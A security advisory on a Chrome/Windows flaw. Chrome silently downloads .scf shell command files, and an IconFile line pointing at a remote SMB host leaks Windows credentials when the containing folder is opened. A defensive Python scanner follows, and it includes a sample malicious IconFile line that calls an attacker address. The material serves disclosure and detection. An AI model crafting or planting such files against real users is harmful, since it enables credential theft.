Watch out for .scf files.
DefenseCode - Home
By default Chrome treats files ending with the .scf extension (Windows Explorer Shell Command File) as safe regardless of source, and will download and save them without prompting the user for a save location. If the .scf file contains a line of the form “IconFile=\\170.170.170.170\icon”, then as soon as the folder containing the downloaded file is opened, the system attempts to retrieve the file “icon” from the IP address given. That address will be hosting an SMB server which transparently requests the user's ID and password via the SMB protocol. This data can then be captured by the attacker and replayed against other services, such as Office 365, or stored for an offline brute-force attack.
There is no need for user interaction: the act of opening the folder containing the malicious file is sufficient to trigger the attack.
There is currently no fix available for Windows, as this behaviour is part of the OS design. The only current mitigation is to change the default setting in Chrome so that it prompts the user to select a save location, which makes the .scf extension visible.
Under normal circumstances Windows Explorer does not display the .scf extension, so “picture.jpg.scf” appears in Windows Explorer as “picture.jpg”.
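As an added example (not code from the DefenseCode write-up), a small Python check a defender could run over a browser download folder: it parses the INI-style contents of .scf files, flags an IconFile value that points at a UNC path (the “\\host\name” form quoted above), and flags a double extension such as “picture.jpg.scf”. The sample .scf contents and file names below are constructed for the example; the 170.170.170.170 address is the one used on the page.

```python
import re
from pathlib import Path

# A UNC path starts with \\host\ (Windows also accepts //host/), which is
# what makes Explorer reach out over SMB when it renders the icon.
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")


def parse_scf(text):
    """Parse INI-style .scf text into {section: {key: value}}, keys lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def scf_findings(name, text):
    """Return the reasons a .scf file looks suspicious (empty list = clean)."""
    findings = []
    lower = name.lower()
    if lower.endswith(".scf") and lower.count(".") > 1:
        findings.append("double extension hides .scf: " + name)
    for values in parse_scf(text).values():  # IconFile normally sits in [Shell]
        icon = values.get("iconfile", "")
        if UNC_RE.match(icon):
            findings.append("IconFile points at a UNC path: " + icon)
    return findings


def scan_directory(root):
    """Map each suspicious *.scf under root (e.g. a Downloads folder) to its findings."""
    report = {}
    for path in Path(root).rglob("*.scf"):
        hits = scf_findings(path.name, path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


# Constructed samples: the stock "Show Desktop" shortcut and a file shaped like the one described above.
BENIGN_SCF = "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n[Taskbar]\nCommand=ToggleDesktop\n"
SUSPICIOUS_SCF = "[Shell]\nCommand=2\nIconFile=\\\\170.170.170.170\\icon\n[Taskbar]\nCommand=ToggleDesktop\n"
```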